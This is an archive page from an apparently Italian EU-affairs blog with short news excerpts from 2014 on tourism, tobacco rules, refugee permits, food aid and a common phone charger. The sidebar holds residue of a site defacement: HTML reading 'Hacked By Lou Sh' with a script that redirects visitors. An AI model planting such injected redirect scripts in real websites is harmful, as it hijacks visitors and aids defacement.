EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Marzo 2014
it

Il 20 febbraio scorso la Commissione europea ha approvato nuove linee guida per poter sostenere gli Stati membri in materia di aeroporti e compagnie aeree. Questa decisione è strettamente correlata al rispetto delle norme comunitarie sugli aiuti di Stato.

Ma su cosa sono improntate le nuove linee guida? Per prima cosa, offriranno la possibilità di collegamenti tra le regioni e migliori spostamenti per i cittadini europei, limitando, per quanto possibile, la concorrenza nel mercato unico. L’obiettivo della Commissione sta nel sostenere lo sviluppo (...)

it

L’indagine Eurobarometro (PREFERENCES OF EUROPEANS TOWARDS TOURISM) condotta tra il 6 e l’11 gennaio 2014 su 31.122 persone provenienti dai 28 Stati membri e da altri sette paesi fuori dall’Ue, evidenzia che il turismo è stato uno degli asset più forti dell’economia in questo periodo di crisi: nel 2013, il 70% dei cittadini europei ha fatto almeno un pernottamento fuori dal luogo di residenza e soltanto l’11% degli intervistati pensa di non lasciare il proprio paese nel corso dell’anno.

Prendendo atto dell’importanza ricoperta dal settore turistico all’interno dell’Unione europea, la Commissione ha presentato lo scorso 20 febbraio una strategia a sostegno del turismo costiero e marittimo. L’obiettivo principale è quello di creare nuovi posti di lavoro all’interno di questo settore (...)

it

Le nuove norme, approvate il 26 febbraio 2014 dal Parlamento europeo, mirano ad ottimizzare l’andamento nel mercato interno sui prodotti del tabacco nell’Ue. Questo consentirà di fornire maggiori misure per la salvaguardia della salute dei cittadini.

L’ultima direttiva emanata nell’ambito dei prodotti del tabacco risale al 2001 e molte volte sia il Consiglio che il Parlamento europeo hanno richiesto un cambiamento della norma, questo perché si sono evoluti tre importanti settori. Il primo è quello dove, grazie alla scienza, sono pervenute (...)

it

Offrire al turista un servizio unico, differenziato e di qualità e nello stesso tempo fronteggiare la concorrenza delle emergenti località turistiche: sono questi gli obiettivi dei nuovi princìpi presentati da Bruxelles per dare un nuovo impulso ad un settore in sofferenza ultimamente. Differenziare l’offerta, garantendo un servizio di qualità, sembra la strada giusta per catturare nuovamente l’attenzione dei consumatori.

Lo scorso 20 febbraio, la Commissione europea ha presentato una serie di nuovi princìpi per migliorare la qualità dei servizi turistici offerti dalle aziende del Vecchio Continente. L’iniziativa della Commissione mira a rendere più allettante il turismo in Europa, ad aumentare i flussi turistici, (...)

it

Grazie al decreto, rifugiati e beneficiari di protezione sussidiaria potranno ottenere il permesso di soggiorno UE per soggiornanti di lungo periodo.

Con un ritardo ingiustificabile (il termine ultimo per il recepimento era previsto per il 20 maggio 2013), il 13 febbraio scorso l’Italia ha finalmente recepito la direttiva 2011/51/UE, che estende ai beneficiari di protezione internazionale la possibilità di ottenere il permesso di soggiorno UE (...)

it

“L’opera umana più bella è essere utile al prossimo”, scriveva Sofocle: migliaia di europei lavorano già come volontari nel mondo intero, assistendo vittime di catastrofi e crisi; molti altri sarebbero pronti a partire se ne avessero la possibilità.

La Commissione europea ha presentato le linee guida del programma EU Aid Volunteers, previsto dal Trattato di Lisbona, rivolto a quanti desiderano rimboccarsi le maniche per intervenire in prima persona nei luoghi colpiti da catastrofi. L’obiettivo generale è quello di fornire opportunità di (...)

it

Secondo gli ultimi dati Eurostat pubblicati nel rapporto “Think Differently” della Croce Rossa italiana, sono 43 milioni gli europei che non hanno cibo a sufficienza ogni giorno e 18 milioni le persone che ricevono aiuti dall’Unione europea. Nei paesi protagonisti dell’indagine Eurostat, inoltre, 120 milioni di cittadini sono a rischio povertà. E’ una situazione che degenera di anno in anno, se si considera che il numero di poveri in Europa è passato dai 6 milioni del 2009 ai 120 milioni del 2012.

La proposta del Parlamento europeo relativa ai nuovi aiuti economici stanziati per le persone indigenti deriva proprio dalla consapevolezza della gravità di questa situazione, testimoniata dai dati riportati. Martedì 25 febbraio, infatti, il Parlamento europeo ha registrato il segno più nella (...)

it

Lo scorso 13 marzo gli eurodeputati, contestualmente all’approvazione della normativa che riguarda i dispositivi radio, hanno sollecitato l’introduzione di un caricabatterie comune per tutti i cellulari europei. L’obiettivo è quello di limitare i costi, i problemi e gli sprechi legati all’utenza. In via informale, la proposta era già stata concordata con il Consiglio dei Ministri.

L’iniziativa di un caricabatterie universale non si focalizza solamente sui telefoni cellulari, ma anche su altri dispositivi come quelli radio, i telecomandi per aprire l’automobile e i modem. Questo per poter essere sempre aggiornati considerate la crescita smisurata e la varietà dei prodotti (...)

it

Il documento di indirizzo sugli stage, approvato lo scorso 15 marzo dal Coreper e rivolto ai 28 Paesi membri, ha spinto l’European Youth Forum e altre organizzazioni europee che lavorano sul fronte dell’occupazione giovanile, a scrivere un’animata lettera di protesta.

Il tirocinio, che dovrebbe servire come passerella tra il mondo della formazione e quello del lavoro, spesso diventa uno strumento, nelle mani dei soggetti ospitanti, per sfruttare i giovani stagisti. Per questo, da diversi anni ormai, molte associazioni europee lavorano con lo scopo di (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France